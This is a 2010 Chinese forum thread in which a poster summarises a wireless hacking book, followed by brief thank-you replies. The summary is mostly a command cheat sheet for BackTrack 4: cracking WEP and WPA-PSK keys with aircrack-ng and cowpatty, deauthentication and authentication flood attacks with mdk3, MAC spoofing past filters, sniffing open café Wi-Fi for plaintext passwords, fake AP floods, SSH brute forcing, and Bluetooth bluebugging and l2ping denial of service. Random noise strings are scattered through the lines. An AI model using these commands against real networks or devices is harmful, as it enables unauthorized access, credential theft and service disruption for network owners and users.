查看: 10374|回复: 34

[转载] 《无线黑客傻瓜书》读后总结

[复制链接]

主题

好友

3719

积分

少校

签到天数: 14 天

[LV.3]偶尔看看II

发表于 2010-2-10 10:59 |显示全部楼层
TG-NET
Anywlan微信公众号
这本书看了一个星期,终于看完了,现把书上的精华总结成如下内容,条理化知识点。( a- R, d7 F. S' `! v
9 u& b* v6 _4 U! B3 _
以下所有操作均在BackTrack 4中进行。
, I8 O9 {6 R& Y* i. D& V9 d1 U7 I) D! q" D

; x( s! V7 z/ L3 ]% z" {% j& I) a无线WEP加密P解:
$ w0 m1 u& w/ A4 z# ^3 @  i5 v6 m+ J1 q! _( O6 ^" k" Z9 O  {8 Y
注入P解:
  \6 r/ b& J+ o  K9 x' Q3 K' H6 p/ l/ @" X& y( W, N
ifconfig5 s8 `- w8 C' Z' A- n5 u

3 `/ s; |5 [4 h* y+ C/ aifconfig –a
( B+ ]& j1 ]5 m& a4 b/ z( J/ g0 J" N, P+ U* ?, @: {
ifconfig wlan0(无线网卡) up0 n. v6 V  Z* a4 b; l
# r6 [" G8 d  w5 I9 L
airmon-ng start wlan0
1 D" m1 W1 j- [, q
- T. x3 p' o) Wairodump-ng mon0+ ~* g+ A* `0 l4 f6 h* `+ y
/ h9 i, S1 p, D; b. {. ]
airodump-ng --ivs –w ivsfile –c 频道 mon0或
* a3 _0 Y, y9 h8 W3 P' J5 u: V3 }2 {+ c& A, _
airodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
6 m" G0 K5 J2 B7 ^, Q7 t7 f
: f1 w& i8 `" j5 P5 faireplay-ng -3 –b BSSID –h Station mon0, f' q" m' ^, [7 y

5 E: C8 T! M6 \5 `- |& W0 Kaircrack-ng ivsfile-01.ivs8 r3 U; c. J8 Y, r- |: b2 y0 P! d

: P" z. u6 p; Z" N. D虚连接P解(适用于无客户端连接APP解): s& L6 h6 r# ?2 ~
% S! b3 q6 M6 ?3 s
ifconfig
. `8 p! B  J9 f0 g$ _9 e+ W/ u% q* I
ifconfig –a+ d1 X2 s6 d+ S# U* T( L6 q

9 O/ P! g, ?' W1 i' I6 i  T, x* t% jifconfig wlan0(无线网卡) up; O1 i  l7 f' K. f% E* ^6 l
) \7 v. g% K3 o" `) X/ T9 U9 }
airmon-ng start wlan0
) l" ?( K2 n/ m
2 ]6 ~. }1 R- Pairodump-ng mon0+ j. d( S( u, z8 G% W" d/ `
2 \$ ~# }: X* e% ^% t) j
airodump-ng --ivs –w ivsfile –c 频道 mon0或
9 B; h6 \' N  a
; }9 R5 [: w1 \2 U! {0 @3 Pairodump-ng --output-format ivs --ivs –w ivsfile –c 频道 mon0
- x; a9 n: g/ u7 s3 C, V
) W  Q. y# Y) `$ F1 A$ ?aireplay-ng -1 0 –e SSID –a BSSID –c Station mon0# I2 Z( v5 J* Z
' l. S; Q$ @) }% w. T3 S
aireplay-ng -2 –p 0841 –c ffffffffffff –b BSSID –h 自己的MAC mon0/ K! @; K0 H0 i6 `: T/ ^( b
# `& t9 X# h  f3 X! ^% H. o
aircrack-ng ivsfile-01.ivs* X& i7 S) e  n) O8 |( ~

" A* @3 D2 l* C( m7 @% b1 A. X$ P; x
5 C% ~  x5 `% C8 m还有傻瓜式P解软件SpoonWEP2,SpoonWEP2中的Chopchop和Fragment来进行无客户端P解,P解时客户端MAC栏留空。! L& p( [7 B7 z  u  Z+ A
0 g/ z* ?, ]9 r" y- Y- k

' h5 o: {: @, l2 t: M  k5 cWPA-PSKP解
- \$ ~6 c, Z6 d7 l+ \4 k7 q# }: ^8 ~# S- ]- a5 v
ifconfig" A7 o& \6 W& n0 Z

  S/ G4 c3 Q! |ifconfig –a
- s- x  D7 g! a. h" i1 ?  Y* a! A5 I1 L8 w
ifconfig wlan0(无线网卡) up% U! `6 X$ Q; f2 ~/ _

2 T  Y7 E+ l' j. W" Vairmon-ng start wlan0. h0 [/ B7 d2 ^$ V9 U1 K; ?8 f( I

& ^# O! |" _$ ~airodump-ng mon06 w3 V8 T2 c& ]# g! Q" p+ H. I

8 R/ s  _2 ^+ B! A/ x4 vairodump-ng –w capfile –c 频道 mon05 b9 g" Z3 s" T0 x1 s) u! R

9 l- f8 d4 h' V8 x) H, Y" haireplay-ng -0 10 –a BSSID –c Station mon0 //Deauth洪水攻击使合法客户端掉线捕获其与AP连接时的握手数据包1 c2 j+ L5 c$ R. b0 i8 ?/ Z1 H
- P  Z! t! |* [/ b/ j" ?4 R
aircrack-ng –w Dic capfile-01.cap或
: c+ w  Y7 V5 Z# K% y1 m9 m' B) R: H) Y; v5 e# Z
cowpatty –f Dic –r capfile-01.cap –s SSID
$ e  V& _# [2 C& P: A
+ K5 Q7 g" E/ [0 Acowpatty –d HashTable.Hash –r capfile-01.cap –s SSID
5 Z) x- l" I1 m  x% Y; |
+ e- K9 ^( c) a, U' C傻瓜式P解软件SpoonWPA。+ g5 ^% _2 o) w5 Q& H* @/ p7 |

4 j- `. X% c9 W% y1 `# N4 NBT4下自带的字典文件:/pentest/passwords/wordlists/darkc0de.lst
, A9 a* k( Z& E; x) p, h
- V2 Q- W' d4 n$ ^3 L. b% U  ]" j/ }+ \* X5 Z7 a& X1 ]
字典文件的生成和上传
- P+ K1 w- C* b2 x
+ d/ {7 A2 c$ ?3 M, c在windows下使用生日密码生成器和社会工程学密码生成器 等生成字典。然后在BT4下开启Tftp、SSH或使用U盘传输。
) H; |8 ?0 F& ~- V& w# Q6 t( d) Q4 W$ |1 E1 v& R, A
7 k& e8 z- k% Q* u7 r7 X5 S# X
BT4下开启Tftp:Services—TFTPD—start TFTPD& u& U2 O! ^) h, `! ?

8 \) \) b: ]  O& [% K6 H% N在Windows的CMD中运行 tftp –i IP put **.dic
4 Q5 e; ~. z* N/ Z. Z! a* Q6 a1 S2 p/ `% c) Z9 n

1 \* |5 _, k8 y8 [BT4下开启SSH:Services—SSH—start SSH
& x9 _3 [- \1 Y* P+ M' Q" A
8 Y; I$ M; ]3 S8 e& O$ iWindows下使用CuteFTP新建连接:File--New—SFTP(SSH2)连接。使用BT4的root用户登录,前提是设置、修改密码:passwd root+ D& P! X$ x* W% Y/ P  m6 f9 s
) e( _' c, s3 j2 D* Y

) [0 X7 W' m# E* |+ HAP限制MAC时的解决6 L9 N+ v1 Z0 `* D9 p' K  Y; [# y

7 L6 L* \) @% p2 A" k5 h* X当AP限制IP连接时,可以伪造为合法用户的MAC,关于AP连接的用户以及MAC,可以使用airodump-ng mon0查看。在BT4下修改MAC的命令为:
! a  J- {) i) j- U
( `6 v3 K  T, \  ]7 T5 x0 y6 L" oifconfig wlan0 hw ether NewMAC! S) u+ P! e9 P1 ~, N8 ?

8 O7 G0 k8 D( e* l! z* }( @% W
! Z5 `6 f" ?- B9 L% i) S7 m关闭SSID广播的AP探测:
, t! v! ]( v/ x4 b/ J8 _! y7 Q, z; ]. J: U* ]
1.     Deauth攻击:$ X' u# p4 E0 ?; f
6 T: z5 I$ k; _2 \3 ?0 n
airodump-ng mon08 K( \3 O+ c( {6 R; _0 d2 b
3 w- o; Z( v/ Q- P: V8 d2 E
aireplay-ng -0 10 –a BSSID –h Station mon0  u& y) ]9 b! x2 m) G4 a( G

2 N/ Q& ^+ `, m1 t, Z2.     抓包分析
$ r+ k; L: [8 J6 ^* s( t! x2 o) I6 z) [
Omnipeek: P& c4 V& v+ Y
- P1 E2 ^/ x" a' n$ q7 Y6 r
Tcpdump –n –e –vvv –i 网卡名
& f! n/ w5 W* C8 S; y  M! X
" t- E, n$ j' {; A5 k3.     暴力P解
; r3 U5 ]0 R: B' w' N7 q6 R
( o0 J. Y3 ^2 l* @7 T0 _3 A' SCharon 1.1暴力P解
  Y5 a0 r4 f" R1 r6 s
4 @+ d0 p1 k: Q# x
9 d- O4 f! t$ ]" G5 l无线加密数据包的解密
# e: t$ ^- ~- S# @) j. j1 Q! o9 g
% m, o; n; p: S  t4 d6 M- C% G& N3 _; o8 E- ^, ^1 y
使用airodump-ng –w capfile –c 频道 mon0 捕获数据包并P解AP的密码 ,使用Cain的Cracker项在802.11Capturea导入解密。解密完后的数据包用Wireshark打开即可分析。
9 W  O# V) U: ]6 C/ C1 Y; L' `$ |( x2 {
FilterNS     DNS解析数据包+ u% F# I/ `" S9 L& Z: q( r

4 W7 [: \2 y8 U- VFilter:HTTP    WEB访问数据包5 u& e2 g& A9 e/ o2 T0 a4 ]# R+ q

9 w; r/ X8 I. c2 q: a: M0 VFilter:msnms   MSN# C/ q6 W' w7 c9 q

' x1 ]/ t) p) n0 n/ ?8 j0 O6 N" hCtrl+F查找pass可以寻找一些明文的密码,如论坛等使用非SSL连接的账号。) m! D2 |- W9 E5 D2 {
+ z3 u5 S+ a; L+ t$ d! ~. U
使用airdecap-ng解密:
; f; s! Q, n8 \- W
0 s  W" Q; t3 x* D8 e' A3 oAirdecap-ng –b BSSID –e SSID –w 密码 ***.cap
- G5 t: u' r: k0 n& x+ Z. R- W) V! e* ~% h
. v5 J1 [6 M; X
咖啡馆中无线数据截取(开放式无加密AP)
2 A9 W1 e( f! l# @+ W
/ ]5 _) m4 b, Q1 i: f& }, ~1.Airodump-ng –w data –c频道 mon0
1 z" n1 f- o* W9 X1 a! H5 K, e8 H
3 G, z6 _6 X5 b8 K( f5 i2.使用WireShark打开分析
# t0 O2 Y9 b; T% ~* H6 I' M$ U4 G- t  v) J

$ K* s7 p3 f: ?BT4下的渗透工具:) T7 Q: p- z: @4 U
. w0 @' r0 H8 P5 u+ N; [
nmap –sP IP/24        判断C段下存活的主机
; C5 J2 P3 Y+ _
' H& f  ?. E$ E1 a( rnmap –vv –sS IP/24 –p Port    扫描指定端口是否开放! e$ K# }9 c2 W, z& F

+ A) p  a7 i7 y7 b( z+ Inmap –vv –sV IP –p port   指定端口的详细信息。。。" f% y( d% N+ V$ g# i0 `8 W

8 v. }* U+ C8 x( g/ Fnamp –O IP/24    判断主机的系统版本
) i* Z0 O! Z+ F% a
1 H" M( S  \+ [( S
1 [2 q4 ]; ~. }9 l/ d# s' nGUI 版nmap:Zenmap + n3 |/ U7 H7 z6 F, Q

" G" [) Q- \& r6 {) x; e% V
. N9 I$ @8 J0 m( w. d! mAmap使用:amap –B IP port8 c' J0 E- O4 V( e% T7 Y$ g- ~9 r* n- c

- P' K8 n9 V$ m1 ^8 c0 tNbtscan(扫描Windows网络NetBios信息):
2 N. e) o3 i+ g( Q- f3 M4 R4 ?1 T/ Z: I" k- m$ T/ u! [$ ]
nbtscan –v –s : IP/24: G; I6 {7 ?# A% Q3 i% l
; @5 _* o* A* Y
nbtscan –r IP
9 [, u6 e8 S" k: ]4 ^( R, _1 I- o+ K5 G  k* U

5 U" u4 y; d+ n# B  E! VDNSWalk(指定域名的DNS探测):./dnswalk XXX.com.
; q3 p& i' i1 Y8 r; Y7 q  B9 U! o
1 X7 g2 L$ |. S4 y' q. p1 O7 O3 s8 X& r" p5 Q
HydraP解工具(backtrack—Privilege Escalation—PasswordAttacks—OnlineAttacks)' b" a7 ?$ }8 @7 w
4 h% N& H$ s5 l. g
BruteSSH: ./bruthe.py –h IP –u Username –d Dic9 M& m; e& X" u

7 c- ^/ L- }# QMetasploit3使用
/ k. u) a5 u) x5 O( t6 {& F无线D.0.S3 M, U1 ]0 ^9 \; E: K0 m
$ }" N, V; c  P
$ P9 h* F+ a' `& P: J$ ?/ y( }- }
Auth Flood 攻击(Authentication Flood Attack,身份验证洪水攻击)
1 ]' t1 O, j, g
5 ~) O, v6 Z# E" K5 eairmon-ng start wlan0
. y4 D, }7 O% \: E
9 j0 g  `# i1 K7 G; _. rairodump-ng mon0
6 u9 ~& X; R  \! E& r6 B# _; u. t3 y5 z$ S# H* c+ f
mdk3 mon0 a –a BSSID
# [: F* q6 s+ Q" R- g! U. d0 V/ T$ W! j2 G& U- Q, v1 i  Z
对所有的AP攻击:mdk3 mon0 a: o# Z; R, Q' @
3 U4 E2 e, O2 [3 E0 L
3 N+ w9 S& w" L$ V; e* H6 U1 M
Deauth Flood 攻击+ Z1 |( ?! ^( p# S) O, ~

/ ~4 ?+ H' j9 F2 P; i2 Smdk3 mon0 d –c Channel
+ [" n1 ~& i% v: u- @: r! h8 M; Y0 U) z* Y6 e: n$ M
图形化D.O.S攻击:Charon5 J+ O$ t: w' C) a) h

+ q- G+ e5 U+ J0 O; V8 n
) A* w1 z, R: g8 R5 q* g当受到攻击时,使用Wireshark抓包可以看到异常信息。' Y+ x  b" O! L0 y% M

, F- `+ Q3 s7 t0 Q/ ?) K
9 E* V3 [6 V& m2 ^2 P: h+ r1 F" {; MWPA-PSK高速P解
% R+ O- |, }- p7 n& W, a  A' V' y' g/ r: ]7 p# Y
1.       WPA-PSK PMK Hash TablesP解2 @$ c5 x2 q3 g1 K' {
0 R; N1 x+ a& D; G- a+ s) [9 k7 B- m
Cowpatty –d HashTable.hash –r ***.cap –s SSID
" A+ \3 _5 p: D' ]2 O, M
' K2 E$ Z' S; I; {# \1 F. }Hash Tables的制作: genpmk –f Dic –d SaveHash –s SSID
$ q3 f- ?& m7 X5 ]( i1 a# w
8 t" [/ Q: y2 o, Q  U: f2.       GPU辅助高速P解& b7 a- A9 f2 y% ^% a6 r* H
$ N4 V4 b( G' S3 ~. F" b
使用EWSA(Elcomsoft Wireless Security Auditor,无线安全审计工具)导入WPA握手数据包P解,未注册版P解后密码只显示2位,但是可以使用WinHex查看(ALT+F9)ewsa进程的内存,搜索 密码的前两位。就可以看到完整密码。! e* u" q* \2 K& r

$ r7 H5 k2 R7 h: q9 c5 T: Q1 c3.       分布式P解" d* G5 ?. [- R- G

) @: o3 b$ y" A/ L1 t" c; _& Q3 y4 ?8 D5 H
AP的伪造
8 p+ z8 T0 [2 S3 [, n6 w- k7 `4 I' |$ r) [* }) ]3 J
把AP的MAC改成目标AP的MAC
( N* a( T) j0 ~2 n& A9 t3 `; ?, W) d) C" k& R; O0 t. B, ~# K
网卡软AP9 ]0 \) s, U0 E1 ~: h6 x' V

9 d2 U5 f4 ~+ u
6 x4 w8 p, f! f% u( F. ]# `伪造大量虚假AP信号:
( x& x7 Z! {& k7 m8 `: J5 m9 U
# Q( }: h/ {# z; |3 V' u随机SSID:mdk3 mon0 b –g –c 频道
8 V. X0 u6 d$ v" P& A% r: F# I, _" I& R2 J. H
指定SSID:mdk3 mon0 b –g –c 频道 –n SSID –s 速度- C* h) E1 a$ u. v

& q% D4 Z! z, c( Z# Q. f2 G
! c+ q9 H& l8 D/ b* J/ q4 UWar-Driving5 f" R0 j, t% ~+ l

1 ]6 ~6 r- t8 L* C3 w热点地图绘制' ^2 k1 k' ?: |  A, x/ E8 [3 G

; |7 K$ d% d; F( ?( F8 EWindows Mobile系统智能手机配合GPS模块,使用WIFifofum探测,把结果导出为kml(Google Earth可识别格式),在Google Earth中打开即可完成热点地图绘制。
9 S/ @4 c. X0 X  g! [
3 J+ V0 E; A/ Y3 i, k& f# Q3 w, V
3 N- u7 ~3 [4 jNetstumble
9 l% Y) b3 R3 F% m: C
: k$ }5 e1 A" g7 `& Q- u/ o( @% r% p+ {7 C
蓝牙Hacking
. J( M6 O& W$ W+ W: Q  a5 C
9 P! u2 M4 ~" BWindows下的Blue Soleil工具
$ P7 U( j# r7 C7 j' k+ X% L: ?7 `
BT4:4 H( Z  C& x' w1 F

$ L8 k5 s( f7 F6 \hciconfig 查看蓝牙适配器1 G$ e. f8 H# _0 `- J

* n* v) o8 L6 K% u! E/ ]hciconfig hci0 up 载入蓝牙适配器
* q  C7 k4 R% `* e+ k4 K/ M9 o2 W# w7 d# P
hciconfig hci0 class 蓝牙适配器详细信息
- e  e+ Z; |, C' N% Q1 a9 X! W2 b+ w

2 n2 e# {& Y. ~: Thcitool(扫描蓝牙)
: u1 H* \2 X) R9 i9 }- `: J" p
/ M$ _) _" h  {& n2 v. N1 @6 f6 ehcitool –i hci0 scan
5 w* s. _+ z5 E5 m- k# j2 [: h* T( Z5 J
BTscanner(扫描蓝牙)4 Y# ~8 e$ F2 I
; V% j! k5 Y4 S7 A# G5 J8 n

& z/ \! O- j' K; }蓝牙攻击:
: j/ n$ l; y1 A. [: ^# j! f; w8 A3 _5 ~3 r4 E4 U
BlueBugging (适用于BlueTooth V1.1的手机)- B! q( E. D, v3 X% G7 y, v: m
9 i! J6 U8 h/ B/ G; _
Bluebugger工具:7 v+ d/ N, f% H$ X. y

: u' d- Q' D8 y5 F/ s3 U0 T! DBulebugger –a HD_Addr info1 G9 H+ a/ k5 n- |! K7 O

% H  g6 K1 f$ s6 X; N1 m4 N; E+ u5 R, n* b* D* d* F; A) z8 Z
BlueJacking
$ X$ V9 I  C' v
  M3 E. E# t: Y# L  o9 b实现方法:使用手机伪造假的名片,里面写上消息内容然后发送。
+ h. G4 O& f' z0 c4 e% C3 j  Q# e( r9 Y$ L$ c
$ g' v8 E2 T3 ?8 I5 n- n) A
HD_Addr修改:8 u  l  A3 ~; N* `$ Y5 M
( Z, @4 p, d0 ^
Bdaddr工具) S- [. v3 `5 p0 _
3 ]. i7 I- b+ A  b% p: V
bdaddr –i 蓝牙设备名 新HD_addr
. ]6 p/ _' Y! Y" `$ K9 \5 A. f% S; x; v- U2 Z

& `6 n" A& Y/ `# ?$ c& }+ E$ e蓝牙D.O.S
* j0 v) G* V& P& d: Z0 d$ t" I
) X: l/ {3 G  i8 r) _! j9 Pl2ping工具(蓝牙连通性测试工具),改变其发包数据包大小,使目标设备拒绝服务
9 f! _+ u' p2 z& }; A; ?. |
5 F5 f8 n# o& D" [8 yhciconfig
& {1 W- X2 ^: }0 j- S" k% x. Q+ M6 W
hciconfig hci0 up" K. g/ A# Q- m

! G% S# ]5 _5 w" a7 Mhcitool –i hci0 scan1 o( A2 M1 a; p
& H5 O6 ^; i* ]  _1 o4 r. W
l2ping –s 10000 –目标MAC
6 \5 ?% }- m& c0 X) s: r9 l5 y' e6 h9 d

- F- A2 P. x$ z$ W( H* D# k8 `不可见状态的蓝牙通过RedFang暴力P解(暴力尝试所有的HD_Addr)(概念性的软件)3 ?$ W+ f4 Y5 K2 j
3 _, b/ ~+ \: L* x6 |
./fang –r ************-############ -s% |* n' R0 \# H) [

: c' G$ E' }! n/ K! I0 \7 Q4 N* m暴力P解************-############的蓝牙设备: W' V* I  D: K5 M* [
3 h# Y7 g6 S6 e: g
./fang –l 各厂商BD_Addr分配
+ w! w" v5 C/ \8 |! t; ]2 @: F2 g; ?, l* T8 p+ p" r; [
4 t1 C( O2 h' w' S" |
WifiZoo使用8 M1 m* H. l% r; Y8 v. G+ q% {7 J

( J3 E5 G% h8 M" X./wifizoo.py –c Capfile# I' `5 v# G$ b& o% t: A
2 P8 c  v5 A; \# L1 `1 O. e- l
访问127.0.0.1:8000即可登录Wifizoo管理页面,查看数据包分析的详情

评分

2

查看全部评分

主题

好友

835

积分

中尉

该用户从未签到

发表于 2010-2-10 11:16 |显示全部楼层
传说中的沙发?
回复

使用道具 举报

主题

好友

149

积分

上等兵

该用户从未签到

发表于 2010-2-10 11:35 |显示全部楼层
我还正在学习中,先收藏。
回复

使用道具 举报

主题

好友

2266

积分

少校

签到天数: 2 天

[LV.1]初来乍到

发表于 2010-2-10 12:42 |显示全部楼层
总结的很好~谢谢分享
回复

使用道具 举报

主题

好友

1138

积分

上尉

签到天数: 5 天

[LV.2]偶尔看看I

发表于 2010-2-10 18:31 |显示全部楼层
分享成功的经验
回复

使用道具 举报

主题

好友

257

积分

少尉

该用户从未签到

发表于 2010-2-12 14:43 |显示全部楼层
呵 ....正在努力学习当中....
回复

使用道具 举报

主题

好友

760

积分

中尉

该用户从未签到

发表于 2010-2-14 14:51 |显示全部楼层
Exellent digest
回复

使用道具 举报

主题

好友

907

积分

中尉

签到天数: 13 天

[LV.3]偶尔看看II

发表于 2010-2-20 23:51 |显示全部楼层
谢谢看了!
回复

使用道具 举报

主题

好友

107

积分

上等兵

该用户从未签到

发表于 2010-2-20 23:54 |显示全部楼层
谁有电子的。  a# W; f' i$ d: M
借来看看。
回复

使用道具 举报

主题

好友

157

积分

上等兵

该用户从未签到

发表于 2010-3-5 19:27 |显示全部楼层
LS的 估计不可能的 会被管理员和谐的
4 l' }, c8 v) y呵呵 其实也不贵 21块 快递再一点
1 T* |% u- j% Y2 H我们也支持一下超级版主这么多年对我们的解答哈
回复

使用道具 举报

主题

好友

487

积分

少尉

该用户从未签到

发表于 2010-3-6 00:31 |显示全部楼层
回复有理,顶贴无罪
回复

使用道具 举报

主题

好友

167

积分

上等兵

该用户从未签到

发表于 2010-3-8 18:56 |显示全部楼层
顶起~~~~~~~~~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 我要加入

本版积分规则

Archiver| 手机版| 中国无线门户 ( 粤ICP备11076993 )  |网站地图    小黑屋 | 免责声明

GMT+8, 2016-5-29 21:19

Powered by Discuz! X3.2

© 2003-2013 广州威思信息科技有限公司

返回顶部 返回列表